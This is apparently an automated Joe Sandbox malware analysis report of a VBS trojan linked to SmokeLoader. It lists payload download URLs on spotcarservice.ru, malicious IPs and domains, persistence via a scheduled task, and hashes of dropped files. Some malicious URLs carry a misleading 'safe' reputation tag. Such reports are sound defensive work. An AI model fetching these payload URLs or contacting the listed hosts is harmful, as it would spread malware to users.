                                                      http://spotcarservice.ru/fdjskf88cvt/putpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://wns.windows.com/)sexplorer.exe, 0000000C.00000000.2215211118.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://spotcarservice.rpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000C.00000000.2230471266.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://spotcarservice.ru/fdjskfpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.5.drfalse
                                                              high
                                                              http://spotcarservice.ru/fdjskf88cvt/invoce2.pdfppowershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://spotcarservice.ru/fdjskf88cvt/invocpowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://spotcarservice.ru/fdjskf88cvt/invopowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://go.micropowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://spotcarservice.ru/fdjskf88cvt/powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://spotcarservice.ru/fdjskf88cvt/ppowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://spotcarservice.ru/fdjskf8powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.ver)svchost.exe, 00000007.00000002.3332246487.00000178BC000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://spotcarservice.ru/fdjskf88cvt/invoce2.pdpowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://outlook.comexplorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://spotcarservice.ru/fdjskf88cvt/ipowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://spotcarservice.ru/fdjskf88cvt/pupowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://spotcarservice.ru/fdjskf88cvt/invpowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://acsk.privatbank.ua/services/tsp/0Cpowershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drfalse
                                                                              high
                                                                              https://g.live.com/odclientsettings/Prod/C:edb.log.7.drfalse
                                                                                high
                                                                                http://spotcarservice.ru/fdjskf88cvt/invocepowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://spotcarservice.ru/fdjskf88cvt/puttpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://spotcarservice.ru/fdjskf88cvt/putty.powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://spotcarservice.ru/fdjskf88cvt/putty.expowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://spotcarservice.ru/fdpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000000.2208689710.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.msn.com/explorer.exe, 0000000C.00000000.2215211118.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2127875110.000001DD67921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://spotcarservice.ru/fdjskf88cvt/puttypowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://acsk.privatbank.ua/crldelta/PB-Delta.crl0powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drfalse
                                                                                        high
                                                                                        http://crl.vexplorer.exe, 0000000C.00000000.2205441339.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://spotcarservice.rupowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD6969D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD67B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://acsk.privatbank.ua/download/certificates/certificates.p7b0Cpowershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            109.70.26.37
                                                                                            connecticutproperty.ruRussian Federation
                                                                                            48287RU-CENTERRUtrue
                                                                                            94.156.177.51
                                                                                            constractionscity1991.latBulgaria
                                                                                            43561NET1-ASBGtrue
                                                                                            IP
                                                                                            127.0.0.1
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1577216
                                                                                            Start date and time:2024-12-18 09:22:22 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 26s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:14
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:-i .vbs
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.expl.evad.winVBS@23/60@5/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 66.7%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 95%
                                                                                            • Number of executed functions: 35
                                                                                            • Number of non-executed functions: 18
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .vbs
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 92.122.16.141, 162.159.61.3, 172.64.41.3, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 23.218.208.109, 23.32.238.18, 23.32.238.74, 199.232.210.172, 23.195.39.65, 184.30.20.134, 2.19.198.27, 23.32.239.56, 13.107.246.63, 52.149.20.212
                                                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6640 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            03:23:15API Interceptor46x Sleep call for process: powershell.exe modified
                                                                                            03:23:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                            03:23:31API Interceptor227228x Sleep call for process: explorer.exe modified
                                                                                            03:23:34API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                            09:23:50Task SchedulerRun new task: Firefox Default Browser Agent 4929C9CFCEDC88EB path: C:\Users\user\AppData\Roaming\ddhfdfu
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            109.70.26.37#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • connecticutproperty.ru/
                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.mrpokrovskii.pro/2pji/
                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.mrpokrovskii.pro/i6b4/
                                                                                            Cmbwwkcevcglau.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/?PVWk=f3HgyfoZyN&ya3hZ6=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==
                                                                                            Uevsumfxudvvsf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/
                                                                                            SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.art-world.gallery/d82s/?10f=JpK121UpvTpc63rRp+gDJCCdgOsyWOtnd1+5GwkwMtQXrqOXZW8giVHgVA/EVEtRUGaZBcKLcc+iDZn9KexNjAxwg4PMjxbaWQ==&p5TzJe=IDSTB-Oy
                                                                                            OUTSTANDING_PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2
                                                                                            031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                            • www.landlotto.ru/8bfi/?zWlew1c=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&OgJSC=ZGqA1YcB
                                                                                            DHL.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.landlotto.ru/0oqq/?Ruu6XZ=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7/rH4CMublm7Haah6y5P+nmPrL&2bZBp4=SbhpRad-bNU
                                                                                            Payment advise.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.commandos-g.com/s44m/?JXr6I=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCAzLm0G93xdpHA==&Wu5p=T5ASsiZg7veLY
                                                                                            94.156.177.51#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • restructurisationservice.ru/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            constractionscity1991.lat#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 94.156.177.51
                                                                                            connecticutproperty.ru#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 109.70.26.37
                                                                                            restructurisationservice.ru#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 94.156.177.51
                                                                                            spotcarservice.ru#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 94.156.177.51
                                                                                            bg.microsoft.map.fastly.net#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 199.232.210.172
                                                                                            ToYwLfhi9B.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                            • 199.232.210.172
                                                                                            17345062850621022e2a034193497843f70f72ad0e2a6d5b0e23bb6cd0de4c41fac1759029833.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                            • 199.232.214.172
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                            • 199.232.210.172
                                                                                            Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 199.232.214.172
                                                                                            Credit Card Authorization Form.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            Configurator.exeGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            hades.exeGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 199.232.214.172
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            NET1-ASBG#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 94.156.177.51
                                                                                            a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            a-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            m-6.8-k.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 93.123.85.8
                                                                                            RU-CENTERRU#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 109.70.26.37
                                                                                            TRC.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                            • 193.232.244.238
                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 109.70.26.37
                                                                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 194.85.61.76
                                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.85.61.76
                                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.85.61.76
                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.85.61.76
                                                                                            Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                                            • 195.208.1.162
                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                            • 109.70.26.37
                                                                                            x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 195.209.89.193
                                                                                            No context
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Roaming\ddhfdfu#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                              C:\Users\user\AppData\Roaming\putty.exe#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.8307386298013925
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugM:gJjJGtpTq2yv1AuNZRY3diu8iBVqFa
                                                                                                MD5:2D8DF3AA321878615918656F412A8B33
                                                                                                SHA1:6137A472011447F8D8C6D3AF6402E0CF2C61AD6A
                                                                                                SHA-256:4BD4293E3E7CDC6E488AF291A86C2EE898FEEAC39943F5BCE8499B385916F272
                                                                                                SHA-512:9A50D9157B30596F8CE3A298703F5F4CC28FCCAAED7DE29F8B3C01D8F9EBC81719DDA0B51EA5A5E782AE932ADA49CC1101B310C63C76968DFFA2DA3FBF191872
                                                                                                Malicious:false
                                                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9f132c60, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.6585956537950506
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                MD5:6D3F1BCD28471985DAF8D906B144F4A8
                                                                                                SHA1:B4DC4F4639582A5CA8234BF92EF906AF0A135EB4
                                                                                                SHA-256:EC60A574FC95A8DD377215327F9D656BC46308D32F921A167CF539778E9C2C83
                                                                                                SHA-512:554D02E0CC6B2E44C5317AF48E93E3E4584134AF3E2611F85B8BCD2C2FD08F2A866EABE78657670EA22C9599990431926CEC5783A473460993FFB1F8F5DA758E
                                                                                                Malicious:false
                                                                                                Preview:..,`... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..........................................|5...................Vp.....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16384
                                                                                                Entropy (8bit):0.08018041918705551
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:9Zc//KYeFZVhVGuAJkhvekl1D3MrtollrekGltll/SPj:78/KzF3brxld31Je3l
                                                                                                MD5:B64A7D62CC5D9BE76F70ED64C3C658C2
                                                                                                SHA1:EAFB167E84E92F80EDF7AEDA60E22441838F19EC
                                                                                                SHA-256:34C3FF90420129610F8A6DBF565E5CFF4CA4E53845F068A6F701326606CBB1AC
                                                                                                SHA-512:F5A5F94BCA933C8387EC612462DA7084AF934983BF23FA2EC60025222D41E4EF4C0513DA2FD9CB4182E98F13E2FECA63A238CDA3D350CF8BFBDD9C56E0AD2C6B
                                                                                                Malicious:false
                                                                                                Preview:..|......................................;...{.......|.......{...............{.......{...XL......{....................Vp.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.1840396701606695
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIBK9+q2P92nKuAl9OmbnIFUt8OBIBmRFJZmw+OBIBaq9VkwO92nKuAl9OmbjLJ:76Pv4HAahFUt8O6Q/+O64U5LHAaSJ
                                                                                                MD5:71AF0A890B4EA691D5D486194207669E
                                                                                                SHA1:C834A5C1D75980B28FCAB26D4348844287A8352E
                                                                                                SHA-256:0AAD7A59BADC0D96ECB401A73810949748755C14CCDD9715447522DB184A732E
                                                                                                SHA-512:D08D05D8FD0DE5A0FF47098DDF133B66F8067F622026225D54625F620849779F119BFEB1E1F40EB5CED1983FE2C246FE597E968BD0D6C1E7BF8B8E46F68054AF
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:22.064 1488 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-03:23:22.066 1488 Recovering log #3.2024/12/18-03:23:22.067 1488 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.1840396701606695
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIBK9+q2P92nKuAl9OmbnIFUt8OBIBmRFJZmw+OBIBaq9VkwO92nKuAl9OmbjLJ:76Pv4HAahFUt8O6Q/+O64U5LHAaSJ
                                                                                                MD5:71AF0A890B4EA691D5D486194207669E
                                                                                                SHA1:C834A5C1D75980B28FCAB26D4348844287A8352E
                                                                                                SHA-256:0AAD7A59BADC0D96ECB401A73810949748755C14CCDD9715447522DB184A732E
                                                                                                SHA-512:D08D05D8FD0DE5A0FF47098DDF133B66F8067F622026225D54625F620849779F119BFEB1E1F40EB5CED1983FE2C246FE597E968BD0D6C1E7BF8B8E46F68054AF
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:22.064 1488 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-03:23:22.066 1488 Recovering log #3.2024/12/18-03:23:22.067 1488 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):338
                                                                                                Entropy (8bit):5.1359233267795705
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIlu89+q2P92nKuAl9Ombzo2jMGIFUt8OBIY3JZmw+OBIY39VkwO92nKuAl9OmT:76Ov4HAa8uFUt8O6YZ/+O6Yz5LHAa8RJ
                                                                                                MD5:A522E0C73F95D6E8222027EDC6323317
                                                                                                SHA1:2A2060C9ABB197CCA86AE5B72405A161EBCFA537
                                                                                                SHA-256:6F170EB8882814394A28E45D6E58B73D7638AE7AAB24DBB5D7C6C134AA85F7D5
                                                                                                SHA-512:4EAE282AB795C2FCBF6C088FE1EDF53C7CBE802B5D33088A1561E4353C71AB07F4A6CFC30B45F2D9E4CAD62408FB5F34B99F3A9FDB8B2AE4B516E718C1E0E1CF
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:22.343 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-03:23:22.346 1c08 Recovering log #3.2024/12/18-03:23:22.346 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):338
                                                                                                Entropy (8bit):5.1359233267795705
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIlu89+q2P92nKuAl9Ombzo2jMGIFUt8OBIY3JZmw+OBIY39VkwO92nKuAl9OmT:76Ov4HAa8uFUt8O6YZ/+O6Yz5LHAa8RJ
